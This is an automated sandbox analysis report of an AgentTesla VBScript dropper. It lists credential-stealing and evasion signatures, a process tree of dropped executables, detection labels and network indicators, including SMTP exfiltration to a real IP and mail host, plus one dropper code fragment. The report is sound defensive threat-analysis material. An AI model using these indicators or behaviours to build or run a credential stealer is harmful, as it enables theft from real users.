Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report TGFTR.vbs

Overview

General Information

Sample Name:TGFTR.vbs
Analysis ID:546894
MD5:49d19f0ce5da944d1423d3f189b22103
SHA1:305fbc7a46a028c4354f13a417ba46f67464ebab
SHA256:ac0517947c0be7baad44fb8f054215c00ada03bb61772bab9eb52e48a9c3a097
Tags:AgentTeslavbs
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Yara detected AgentTesla
VBScript performs obfuscated calls to suspicious functions
Yara detected AntiVM3
Multi AV Scanner detection for dropped file
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Potential malicious VBS script found (has network functionality)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Yara detected Credential Stealer
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 3672 cmdline: C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\TGFTR.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • anyname.exe (PID: 6000 cmdline: "C:\Users\user\AppData\Local\Temp\anyname.exe" MD5: 9AC2AB7CA14ACC134AEFDF731DED674B)
      • anyname.exe (PID: 6260 cmdline: C:\Users\user\AppData\Local\Temp\anyname.exe MD5: 9AC2AB7CA14ACC134AEFDF731DED674B)
      • anyname.exe (PID: 5940 cmdline: C:\Users\user\AppData\Local\Temp\anyname.exe MD5: 9AC2AB7CA14ACC134AEFDF731DED674B)
      • anyname.exe (PID: 6116 cmdline: C:\Users\user\AppData\Local\Temp\anyname.exe MD5: 9AC2AB7CA14ACC134AEFDF731DED674B)
      • anyname.exe (PID: 5608 cmdline: C:\Users\user\AppData\Local\Temp\anyname.exe MD5: 9AC2AB7CA14ACC134AEFDF731DED674B)
  • jNnIJrO.exe (PID: 5952 cmdline: "C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe" MD5: 9AC2AB7CA14ACC134AEFDF731DED674B)
    • jNnIJrO.exe (PID: 2276 cmdline: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe MD5: 9AC2AB7CA14ACC134AEFDF731DED674B)
  • jNnIJrO.exe (PID: 5280 cmdline: "C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe" MD5: 9AC2AB7CA14ACC134AEFDF731DED674B)
    • jNnIJrO.exe (PID: 6456 cmdline: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe MD5: 9AC2AB7CA14ACC134AEFDF731DED674B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.339301678.0000000003449000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000001.00000002.339301678.0000000003449000.00000004.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      0000000E.00000000.414176975.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        0000000E.00000000.414176975.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          0000000E.00000002.437781088.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 52 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            14.0.jNnIJrO.exe.400000.4.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              14.0.jNnIJrO.exe.400000.4.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                6.0.anyname.exe.400000.10.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  6.0.anyname.exe.400000.10.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    18.0.jNnIJrO.exe.400000.10.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 61 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: TGFTR.vbsReversingLabs: Detection: 39%
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeReversingLabs: Detection: 32%
                      Source: C:\Users\user\AppData\Local\Temp\tmpG259.tmp (copy)ReversingLabs: Detection: 32%
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeReversingLabs: Detection: 32%
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeJoe Sandbox ML: detected
                      Source: 6.0.anyname.exe.400000.10.unpackAvira: Label: TR/Spy.Gen8
                      Source: 18.0.jNnIJrO.exe.400000.10.unpackAvira: Label: TR/Spy.Gen8
                      Source: 14.0.jNnIJrO.exe.400000.4.unpackAvira: Label: TR/Spy.Gen8
                      Source: 14.2.jNnIJrO.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                      Source: 14.0.jNnIJrO.exe.400000.6.unpackAvira: Label: TR/Spy.Gen8
                      Source: 6.2.anyname.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                      Source: 6.0.anyname.exe.400000.4.unpackAvira: Label: TR/Spy.Gen8
                      Source: 14.0.jNnIJrO.exe.400000.12.unpackAvira: Label: TR/Spy.Gen8
                      Source: 18.0.jNnIJrO.exe.400000.6.unpackAvira: Label: TR/Spy.Gen8
                      Source: 18.0.jNnIJrO.exe.400000.4.unpackAvira: Label: TR/Spy.Gen8
                      Source: 18.0.jNnIJrO.exe.400000.12.unpackAvira: Label: TR/Spy.Gen8
                      Source: 18.2.jNnIJrO.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                      Source: 6.0.anyname.exe.400000.8.unpackAvira: Label: TR/Spy.Gen8
                      Source: 18.0.jNnIJrO.exe.400000.8.unpackAvira: Label: TR/Spy.Gen8
                      Source: 14.0.jNnIJrO.exe.400000.10.unpackAvira: Label: TR/Spy.Gen8
                      Source: 14.0.jNnIJrO.exe.400000.8.unpackAvira: Label: TR/Spy.Gen8
                      Source: 6.0.anyname.exe.400000.12.unpackAvira: Label: TR/Spy.Gen8
                      Source: 6.0.anyname.exe.400000.6.unpackAvira: Label: TR/Spy.Gen8
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeCode function: 4x nop then jmp 06F99093h10_2_06F98328

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49799 -> 162.241.148.206:587
                      Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49800 -> 162.241.148.206:587
                      Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49803 -> 162.241.148.206:587
                      Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49804 -> 162.241.148.206:587
                      Potential malicious VBS script found (has network functionality)Show sources
                      Source: Initial file: sea.SavetoFile maasr & "\anyname.exe",2
                      Source: global trafficTCP traffic: 192.168.2.3:49799 -> 162.241.148.206:587
                      Source: global trafficTCP traffic: 192.168.2.3:49799 -> 162.241.148.206:587
                      Source: anyname.exe, 00000006.00000002.823366416.0000000002DD1000.00000004.00000001.sdmp, jNnIJrO.exe, 0000000E.00000002.439216232.0000000002FE1000.00000004.00000001.sdmp, jNnIJrO.exe, 00000012.00000002.824325494.00000000030E1000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: jNnIJrO.exe, 00000012.00000002.824325494.00000000030E1000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                      Source: jNnIJrO.exe, 00000012.00000002.824325494.00000000030E1000.00000004.00000001.sdmpString found in binary or memory: http://PGwAqe.com
                      Source: anyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                      Source: anyname.exe, 00000006.00000002.825426440.0000000003138000.00000004.00000001.sdmp, anyname.exe, 00000006.00000002.825518834.000000000315A000.00000004.00000001.sdmp, jNnIJrO.exe, 00000012.00000002.826045034.0000000003461000.00000004.00000001.sdmp, jNnIJrO.exe, 00000012.00000002.825746785.000000000343E000.00000004.00000001.sdmpString found in binary or memory: http://mail.gnvmetalica.pe
                      Source: anyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.303350130.0000000005389000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: anyname.exe, 00000001.00000003.304640191.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304726542.0000000005393000.00000004.00000001.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.html0
                      Source: anyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                      Source: anyname.exe, 00000001.00000003.306557310.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306216816.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306488948.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306339731.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306416301.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306158695.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306247274.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306384385.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306447674.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306522725.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306584518.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306611590.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306185319.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306281192.0000000005384000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                      Source: anyname.exe, 00000001.00000003.307705902.0000000005373000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307218412.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307110201.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307047335.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307170119.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307135343.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307270002.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307012712.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307071537.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307193624.0000000005385000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/
                      Source: anyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                      Source: anyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                      Source: anyname.exe, 00000001.00000003.307110201.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307047335.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307012712.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307071537.0000000005385000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
                      Source: anyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                      Source: anyname.exe, 00000001.00000003.307110201.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307047335.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307012712.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307071537.0000000005385000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmle
                      Source: anyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                      Source: anyname.exe, 00000001.00000003.306522725.0000000005384000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html.
                      Source: anyname.exe, 00000001.00000003.306522725.0000000005384000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.htmlh)7
                      Source: anyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                      Source: anyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                      Source: anyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                      Source: anyname.exe, 00000001.00000003.306557310.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306216816.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306488948.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306339731.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306416301.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306158695.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306247274.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306384385.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306125466.0000000005380000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306447674.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306522725.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306584518.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306611590.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306185319.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306281192.0000000005384000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/u
                      Source: anyname.exe, 00000001.00000003.306557310.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307218412.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307110201.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307170119.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307135343.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307270002.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307071537.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306584518.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307193624.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306611590.0000000005384000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comF
                      Source: anyname.exe, 00000001.00000003.307218412.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307110201.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307170119.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307135343.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307270002.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307193624.0000000005385000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comFj
                      Source: anyname.exe, 00000001.00000003.307218412.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307110201.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307170119.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307135343.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307270002.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307071537.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307193624.0000000005385000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comI.TTF
                      Source: anyname.exe, 00000001.00000002.342505137.000000000538A000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.336787753.0000000005387000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.coma2
                      Source: anyname.exe, 00000001.00000003.306158695.0000000005384000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.coma=
                      Source: anyname.exe, 00000001.00000003.307218412.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307110201.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307170119.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307135343.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307270002.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307193624.0000000005385000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comalic
                      Source: anyname.exe, 00000001.00000003.306557310.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306216816.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306488948.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306339731.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306416301.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306908381.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306247274.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306384385.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306974365.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306447674.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306522725.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306584518.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306611590.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306185319.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306281192.0000000005384000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comcoma=
                      Source: anyname.exe, 00000001.00000003.306557310.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306522725.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306584518.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306611590.0000000005384000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comcomd
                      Source: anyname.exe, 00000001.00000003.306281192.0000000005384000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comd
                      Source: anyname.exe, 00000001.00000003.306557310.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307705902.0000000005373000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307218412.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307110201.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306908381.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307047335.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307170119.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307135343.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307270002.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306974365.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307012712.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306522725.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307071537.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306584518.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307193624.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306611590.0000000005384000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comdc
                      Source: anyname.exe, 00000001.00000003.306125466.0000000005380000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comgrita=
                      Source: anyname.exe, 00000001.00000003.307218412.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307110201.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307047335.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307170119.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307135343.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307270002.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307012712.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307071537.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307193624.0000000005385000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comitud
                      Source: anyname.exe, 00000001.00000002.342505137.000000000538A000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.336787753.0000000005387000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comld
                      Source: anyname.exe, 00000001.00000002.342505137.000000000538A000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.336787753.0000000005387000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.commom
                      Source: anyname.exe, 00000001.00000002.342505137.000000000538A000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.336787753.0000000005387000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.como
                      Source: anyname.exe, 00000001.00000003.307270002.0000000005385000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comrsiv
                      Source: anyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
                      Source: anyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                      Source: anyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                      Source: anyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                      Source: anyname.exe, 00000001.00000003.302877241.0000000005372000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn9
                      Source: anyname.exe, 00000001.00000003.302877241.0000000005372000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnd
                      Source: anyname.exe, 00000001.00000003.308329187.000000000537D000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/
                      Source: anyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                      Source: anyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: anyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                      Source: anyname.exe, 00000001.00000003.304310308.0000000005393000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                      Source: anyname.exe, 00000001.00000003.304640191.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304505516.0000000005383000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304121443.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304198095.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304527460.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304377221.000000000537D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304187285.0000000005391000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304449883.0000000005381000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304310308.0000000005393000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/#
                      Source: anyname.exe, 00000001.00000003.304121443.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304034173.000000000538D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304002699.000000000538D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.303924115.0000000005392000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/%7
                      Source: anyname.exe, 00000001.00000003.303718023.0000000005381000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304640191.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304505516.0000000005383000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304121443.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304198095.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304527460.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304377221.000000000537D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304034173.000000000538D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.303741179.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304002699.000000000538D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.303924115.0000000005392000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304187285.0000000005391000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304449883.0000000005381000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304310308.0000000005393000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp//
                      Source: anyname.exe, 00000001.00000003.303718023.0000000005381000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304640191.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304813720.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304505516.0000000005383000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304121443.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304726542.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304198095.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304778818.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304527460.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304377221.000000000537D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304034173.000000000538D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304864654.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.303741179.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304002699.000000000538D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.303924115.0000000005392000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304187285.0000000005391000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304449883.0000000005381000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304310308.0000000005393000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/2
                      Source: anyname.exe, 00000001.00000003.304121443.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304198095.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304034173.000000000538D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304002699.000000000538D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.303924115.0000000005392000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304187285.0000000005391000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304310308.0000000005393000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/N
